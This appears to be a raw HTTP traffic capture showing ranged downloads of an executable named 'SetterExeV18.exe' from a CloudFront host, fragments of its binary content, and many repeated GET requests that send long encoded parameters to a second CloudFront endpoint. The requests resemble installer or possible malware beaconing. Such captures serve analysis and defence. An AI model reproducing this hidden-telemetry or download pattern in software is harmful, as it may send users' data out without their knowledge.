.Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..E

Tag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP

.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..Content-Range: bytes 500000

-520703/520704..X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660

302bc6c8d6a96c71ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 3GTcsb7j6

3vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==......`...1090.0.1y1.1.

1.1.1.1.2R2.5.5j6p6.6.6.7.7.7.8.8.9.9.:.:2:.:.:.;.;.<.<.<f&gt

;.>.>.>V?y?.?.?......d...O0.0.0.1.1S1.2.2.2.2.2.3.3.4.4.4.6.6

.7 7.7.7.7!8|8.9.989D9.92:.:.:.:.;.;.;0<?<[<j<.= =.=s>}

>....(...!101>1.1.1.5.5.5N9]9k9.9.9R=a=o=.........0.1.1.2;2H2\2.

2.4P4v4.4.5i6.6.6.6.6.6.7.7 7W7d7x7.7.7.7.7.7.848L8R8.8.8.8.8.959.9.9.

: :l:.:.:.:.;X;.;.;.;I<.<.<.<.=.=.=.=.=.>;>P>h&gt

;y>.>. .......010.0.0.0.1W1\1t1.1.1.1.1.222N2S2_2d2|2.2.2.2.2.2.

2.3*3:3P3x3.3.3.3.3.3.3.3.4.4!4-424>4C4O4T4r4.4.4n5.6.6.6.6'777.9.9

.9.9P:Y:b:q:.:a<.<.<.=.=.>.>...0.......1)1c1|1.1.1.2.2a

2.2.2.2.2'3^3.3.304j4.4.4.4.5.5.5a6.6.7.7*787.9.9.9n:~:.:.:.:.:.:.:.;T

;.;.<%<9<M<a<u<.<.<.<.<.<.<.=.=)==

=Q=e=.=.>o>.?|?.?.?.?.?.?.?.?...@.......0%0-040<0D0j0}0.0.0.0

.0.0.0.0.0.1.1u1.2.2.2.2.2)2o2.2.2.2.2.2.3.3!3*323:3}3.3.3.3.3.3.4.4.4

D5T5.5.5.5.5.5.5.5.5.5,6E6V6.6.6.667G7.7.8X8`8u8.8.8.8.9j9.9.9.9.9

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 250000-499999/520704

X-Cache: Miss from cloudfront

Via: 1.1 0f0009772734d6975e26e0a8bc4716ea.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nVRXnqt6YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..

ETag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:19:55 GMT..Content-Range: bytes 25000

0-499999/520704..X-Cache: Miss from cloudfront..Via: 1.1 0f0009772734d

6975e26e0a8bc4716ea.cloudfront.net (CloudFront)..X-Amz-Cf-Id: nVRXnqt6

YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==........Y.e...=..G....

......<.G......E..8.G..}.........5..G..5T.E......]...tt.5..G......]

..}..}.....}.;.rWj...P.E.9.t.;.rG.7....j...P.E......5..G..5T.E....E..5

..G....M.9M.u.9E.t..M....]..E.....h..E.h..E......YYh..E.h..E......YY.E

...... ....}..u)....G.....j..'...Y.u..\....}..t.j......Y.......U..j.j.

.u.........].U...}..u.............t......]..u.j..5h.G.....E.].........

.h`.C.d.5.....D$..l$..l$. .SVW.@gG.1E.3.P.e..u..E..E......E..E.d......

.M.d......Y__^[..]Q........U.....S.].VW.E...{..s.3=@gG..E..........t..

O...3.0.c....G..O...3.0.S....E..@.f.......E..E..E..E..C..C..E.........

...@.@..L........E...t{..........M.....~...~h.E..8csm.u(.=..E..t.h..E.

.t........t.j..u.....E.....U..M.......E..U.9P.t.h@gG.V........E..X....

..tu.f.M..]........^.....tG.!.E........{..t6h@gG.V.................t..

O...3.0.K....W..O...3.2.;....E._^[..]..O...3.0.$....G..O...3.0......M.

...I..&......U....(....@gG.3..E..}..Wt..u...i..Y.............jLj.P.@..

..................0.............................................f.

<<< skipped >>>

GET /p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WDJQ_AmQCj3DOUvDNet276USb0n9R5Syp64R51jcdIB_hNelRlGALw==

....

GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I3wvhbsz-MuIPBOjIs_Buwbt20jDNtFQUhamXcycquB_sVRdm2wvCw==

....

GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tpVNEEjPUKsR3xznGiKszFZH6K4UPVtvA5w5sq1NJ5ZqXWFHL7V4kg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: N1k_BQdXgQSTh0-hwGBPdcvAa3SBdpFDQ3fU5nVaf4kKvysGzYRyyQ==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vj8wThi7a3s8evEhdgzuBZarQwn1qv6TW_2iC4uU7g1LavBzFHaLVQ==

....

GET /p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NXSvxLH2j51CFR7tAe8VeLJ5lTxwLZw==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401

5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NX

SvxLH2j51CFR7tAe8VeLJ5lTxwLZw==..

....

GET /p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KxTigRIEcxwbVd0v8l-Jwo1o5sj4ldFuNx8wfL38g27Bqi9y48bnpA==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DKpiBbkiJrOz9FrXnZ89Ew1a4WB6hOyBGJjbT-U2db6JIslC6aDWuA==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Og9L2kgUApwlrapQyHHerAfAMVdGprj0D5LF_xjtzjfOJNMnlr7p3Q==

....

GET /p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: b9uR23ouXqBWjc9tDJU8OTmNowr0EMn16S7liZmnoeQeS72XVRw_VQ==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I2yw_weYa1bF4D36PoW1hN9W5PQOFh6-BUBVOz50hFEzo5ycZ2t6OQ==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2HuF_tBQN193VZwLiY3Off-O-5QicA==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401

5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2

HuF_tBQN193VZwLiY3Off-O-5QicA==..

GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6JHsJJEIQeYo0-U4dqKv6CYhch8_WMhUszeoGYkXgpLzvmwM9QdOtA==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BlAOFcxwbOiXn9xTHFZ1UzETNCtZcA3a9c34Qmz6j7wUpVvdqQUGeg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HbrK3FyvFAcYm46fOi9tRs90Cqn9Eg9S-wuHmAEBaGAYkUkTGH1ZNw==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gFG1ay4GmQ0_IlYntzciED7awRAsPn-4_J9A49SOEymDwjnkPpy1oA==

....

GET /p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9kADtTjf7A5aNO6KYijkZhmOQNlnkg==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:57 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452

59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: p5ELyWwKmjomEc2poXe2ugCS9

kADtTjf7A5aNO6KYijkZhmOQNlnkg==..

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kH9M4ekPufriambI8C0A_aLFK1VYvCRfBp-wq3vJiPyl1FtCKAtS_A==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 0S8KGBuGMkqPy9cBQgxTzAdiRAmoEFbFBGUTLOwoi8dlWjrJo4koLw==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2YXlRet6tnFPhmM98-RqzfUyCCRYZV4i7Xhs_vNWHDiRubY12AoB8Q==

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPfuN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 3ccfbae98f5816b531634c1e82e452

59.cloudfront.net (CloudFront)..X-Amz-Cf-Id: oTTUpjh13vBM9R7uL1lLXiaPf

uN6_O8D5L81ndXQn8Dj5Aee-_I0EQ==..

....

